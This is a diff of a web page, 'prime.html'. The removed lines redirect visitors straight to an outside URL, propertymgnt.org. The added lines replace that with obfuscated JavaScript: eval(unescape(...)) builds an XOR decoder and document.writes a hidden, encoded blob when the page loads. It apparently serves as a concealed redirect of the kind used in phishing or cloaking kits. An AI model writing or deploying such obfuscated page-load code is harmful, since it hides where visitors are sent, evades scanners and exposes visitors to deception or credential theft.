--- a/prime.html
+++ b/prime.html
@@ -1,10 +1,17 @@
-<!DOCTYPE html>
-<html lang="en"> 
-<meta name="referrer" content="no-referrer" />
-    <!-- For Edge and Safari -->
-<!--     <meta name="referrer" content="never" /> -->
-<!--     <meta http-equiv="refresh" content="0; URL=https://propertymgnt.org/nn?kali" /> -->
+<html>
+<head>
+</head>
+<body>
 
+<script type="text/javascript">
+<!-- 
+eval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%34%34%62%39%37%63%66%65%31%33%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%38%35%39%35%34%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%37%32%36%30%39%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%31%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
+eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%34%34%62%39%37%63%66%65%31%33%28%27') + '%3b%25%40%51%43%5c%52%54%41%23%6f%75%67%6b%38%0b%0a%3a%60%7d%6b%6a%23%6b%62%66%6e%39%26%67%68%2a%37%24%09%09%27%21%28%27%3a%71%65%74%63%79%70%38%23%7e%6a%66%63%77%7d%2e%6a%79%6c%67%72%68%76%6f%26%75%61%74%6c%65%6d%6e%2c%2f%6b%73%75%78%72%3c%35%31%76%7a%78%74%61%71%73%7a%67%6e%68%70%2e%77%7a%60%35%68%6d%46%6c%6b%6b%6d%2d%2b%3b%34%38%71%63%71%6c%71%7c%39%09%0e%3c%37%60%7d%6b%6a%3d8595410%36%37%35%31%37%39%38' + unescape('%27%29%29%3b'));
+// -->
+</script>
+<noscript><i>Javascript required</i></noscript>
 
-    <script> window.location.replace('https://propertymgnt.org/nn?kali');</script>
+</body>
 </html>
+
+
